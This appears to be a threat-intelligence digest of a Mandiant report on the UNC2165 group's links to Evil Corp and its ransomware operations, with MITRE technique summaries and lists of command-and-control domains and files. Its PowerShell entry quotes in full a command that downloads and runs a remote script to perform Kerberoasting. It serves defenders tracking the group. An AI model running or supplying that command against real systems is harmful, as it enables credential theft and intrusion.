Threat Research

To HADES and Back: UNC2165 Shifts to LOCKBIT to Evade Sanctions

Securonix

UNC2165 is analyzed as overlapping with Evil Corp activities and shifting toward ransomware deployments such as HADES and LOCKBIT, leveraging FAKEUPDATES, BEACON, and post-exploitation techniques to breach networks while evading sanctions. The report traces the actor’s evolution from DRIDEX/FAKEUPDATES infrastructure to affiliate-style ransomware operations and highlights indicators linking UNC2165 to Evil Corp alongside potential SilverFish overlaps and BEACON C2 activity. hashtags: #UNC2165 #EvilCorp #FAKEUPDATES #BEACON #WASTEDLOCKER #GOLDWINTER #GOLDDRAKE #LOCKBIT

Keypoints

  • UNC2165 likely represents an evolution of Evil Corp affiliated activity, with links to DRIDEX/FAKEUPDATES and overlaps in infrastructure and ransomware families.
  • Initial access primarily comes from FAKEUPDATES infections that deliver BEACON loaders, sometimes using suspected stolen credentials.
  • HADES ransomware is deployed by UNC2165 and shares code/functional similarities with Evil Corp operations; BEACON C&C infrastructure is a recurring element.
  • BEACON payloads, including BEACON C&C servers, are publicly reported in association with Evil Corp activity and linked to UNC2165 via multiple artifacts.
  • The operation shows heavy credential theft and privilege escalation (Mimikatz, Kerberoasting) and extensive use of post-exploitation tools and scripts.
  • Lateral movement relies on BEACON with RDP/SSH, VPNs, and creation of new local accounts; defense evasion includes Defender/AV bypass and registry modifications.
  • Data exfiltration often precedes encryption (via Rclone/MEGASync), and there is a trend toward using RaaS (LOCKBIT) to accelerate ransomware deployment.

MITRE Techniques

  • [T1189] Drive-by Compromise –
    UNC2165 has primarily gained access to victim organizations via FAKEUPDATES infections that ultimately deliver loaders to deploy BEACON samples on impacted hosts.
  • [T1127.001] MSBuild –
    a command appearing in a screenshot within the ProDaft report is consistent with UNC2165 activity. This command reportedly executes a BEACON payload that communicates with the C&C domain tanzaniafisheries[.]com from a .csproj file using msbuild.exe.
  • [T1059.001] PowerShell –
    cmd.exe /C cmd /c powershell -nop -exec bypass -c iex(new-object net.webclient).downloadstring(β€˜https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpPack.ps1’); PowerSharpPack -Rubeus -Command β€œkerberoast”
  • [T1218.011] Rundll32 –
    The COLORFAKE DLL is placed within %ProgramData% as a .tmp file, renamed to a DLL, and subsequently executed by RunDLL32 with its export function.
  • [T1047] Windows Management Instrumentation –
    UNC2165 has used WMI to stop and uninstall anti-virus products and other Windows Services prior to ransomware deployment.
  • [T1112] Modify Registry –
    modify multiple Windows Registry keys with an aim to remove some barriers to ransomware execution.
  • [T1562.001] Disable or Modify Tools –
    disable utilities commonly used by administrators such as the Windows task manager, registry tools, and the command prompt.
  • [T1562.004] Disable or Modify System Firewall/Defenses –
    disable Windows Defender and clears Windows event logs as part of the final ransomware execution stages.
  • [T1021.001] Remote Desktop Protocol –
    The threat actors moved laterally within victim environments via RDP.
  • [T1021.004] SSH –
    The threat actors connected via SSH to enterprise storage systems using PuTTy.
  • [T1053.005] Scheduled Task –
    use of scheduled tasks as part of execution/persistence (referenced under broader Execution/Discovery patterns).
  • [T1558.003] Kerberoasting –
    Kerberoasting attacks to obtain extensive credential access in target environments.
  • [T1003.001] LSASS Memory –
    Mimikatz usage to obtain credentials, leveraged with Kerberoasting to expand access.

Indicators of Compromise

  • [Domain] tanzaniafisheries.com – BEACON C2 domain used by UNC2165 payloads via .csproj-based loaders.
  • [Domain] mwebsoft.com – BEACON C&C server domain reported by others as Evil Corp related activity.
  • [Domain] rostraffic.com – BEACON C&C artifact linked to Evil Corp activity.
  • [Domain] consultane.com – BEACON C&C artifact linked to Evil Corp activity.
  • [Domain] traffichi.com – BEACON C&C artifact linked to Evil Corp activity.
  • [Domain] amazingdonutco.com – BEACON C&C artifact linked to Evil Corp activity.
  • [Domain] cofeedback.com – BEACON C&C artifact linked to Evil Corp activity.
  • [Domain] adsmarketart.com – BEACON C&C artifact linked to Evil Corp activity.
  • [Domain] websitelistbuilder.com – BEACON C&C artifact linked to Evil Corp activity.
  • [Domain] advancedanalysis.beadsmarketart.com – BEACON C&C artifact linked to Evil Corp activity.
  • [Domain] beadsmarketart.com – BEACON C&C artifact linked to Evil Corp activity.
  • [Domain] cutyoutube.com – BEACON C&C artifact linked to SilverFish/UNC2165 activity.
  • [Domain] onlinemoula.com – BEACON C&C artifact linked to SilverFish/UNC2165 activity.
  • [File] VIDRESZR1.dll – COLORFAKE loader DLL placed in %ProgramData% and executed via RunDLL32.
  • [File] fileid = β€˜190’ – payload retrieval reference used by FAKEUPDATES loader (content fetched by fileid).

Read more: https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions